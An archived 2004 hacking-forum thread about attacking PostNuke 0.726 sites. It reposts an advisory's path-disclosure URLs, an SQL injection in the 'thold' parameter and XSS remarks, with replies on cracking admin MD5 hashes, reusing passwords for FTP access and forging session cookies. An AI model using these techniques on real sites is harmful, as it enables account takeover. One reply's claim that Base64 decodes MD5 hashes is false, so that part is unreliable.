very nice little paper i found on mantissecurity.net. Allows you to get the admin hash and full path to their account. So if people have taught us anything, its that they use the smae pass for just about everything, so once you crack admin hash you can sign into their ftp acct through getting their account name for the host and have root and access to everything (wich isnt possible through just having the postnuke admin pass)
PostNuke is an open source, open developement content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC Server irc.postnuke.com channel...
PostNuke is an open source, open developement content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke Or at the Community Forums located at: http://forums.postnuke.com/
Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A. Full path disclosure:
A1 - legacy code
/http://localhost/postnuke0726/admin.php?module=Past_Nuke&op=deleteNotice Fatal error: Call to undefined function: deletenotice() in D:\apache_wwwroot\postnuke0726\admin.php on line 87
It seems, that this function - deletenotice() - is removed in new versions, but reference still exists. Btw, anyone without any authentication can provoke this error, not only admins.
A2 - path disclosure through sql injection
/http://localhost/postnuke0726/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=p Fatal error: Call to a member function on a non-object in D:\apache_wwwroot\postnuke0726\modules\NS-Polls\comments.php on line 454
This is sql injection bug through variable named "thold", but here we use it for path disclosure.
B. Cross-site scripting aka XSS:
Exploiting XSS in PostNuke is difficult task, because PostNuke will filter out most of the "useful" tags, like <script>. But anyway, there exists XSS bugs and they can be exploited, using some custom technics (therefore loosing crossbrowser compatibility of the sploit).
its easier said than done...MD5's are such a bitch to crack.
+ ive used this before and it only returns something like an MD5 Hash only about 5 characters shorter. im not quite sure what to make of it....or at least the ones ive seen
r3L4x
Apr 25 2004, 03:28 AM
no it works fine, you would be suprised a man calls him self a "programmer/hacker" yet his admin pass is, guess, admin99 people are stupider then you think
also a hash is a hash is a hash, they all do the same thing no matter what algo it is. SHA, tiger, CRC,md they all work the same. i guess the only diff would be how long it takes to compute.
archphase
Apr 25 2004, 03:56 AM
is this how the noobs @ AYF (www.areyoufearless.com) got owned, yes?
ssj4conejo
Apr 25 2004, 05:08 AM
The admin99 pass is quite common, i wonder how many banana peels these admins smoke daily.. the funniest pass that i've seen is mssucks... lol, a win2k password... it shows the love for m$.
r3L4x
Apr 25 2004, 05:39 AM
im testing the waters of rainbowcrack 1.2 right now i have slightly started generating the 200mb hash table, and acording to my calculations it should take another 9 hours the table is for passwords 8 chars to 13, since bruteforcing every 7 charaacter lowercase alpha numeric character takes about 30 min and under it takes seconds but over 8 takes days.
what can u do with the md5 hash for postnuke? iv been trying to figure out the cookies.. POSTNUKESID= ? not really sure what they info they are using to come of with the cookie if anyone knows please inform me.
whiskah
Jun 19 2004, 07:32 AM
QUOTE (Nick @ Jun 19 2004, 08:47 AM)
what can u do with the md5 hash for postnuke? iv been trying to figure out the cookies.. POSTNUKESID= ? not really sure what they info they are using to come of with the cookie if anyone knows please inform me.
u have to crack/decrypt the md5 hash otherwise u have to modify ur cookies.. waraxe has made a nice tut on how to mod ur cookie..just goto to his site..
MasterWeb
Jun 19 2004, 02:42 PM
i thinks you can Decrypt this hashes in e BASE64Coder ! like this : http://www.robertgraham.com/tools/base64coder.html Type Adminuser:hash and then click decrypt ! in Phpnuke i use this link : www.site.com/admin.php&admin=Hash ! but in Post Nuke Admin.php Redirected on index.php ! where i can use this Decrypted Hash !?
Nick
Jun 23 2004, 05:15 AM
but the info that is actually used in the postnuke cookie isnt the actual md5 hash of the pw does any one know what its the md5 hash of
could it be the md5 of
<user>:<md5 of the pw>
if anyone knows how the postnuke cookies work please let me know.. i know how the phpnuke and phpbb work.. jsut trying to figure out the post nuke
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
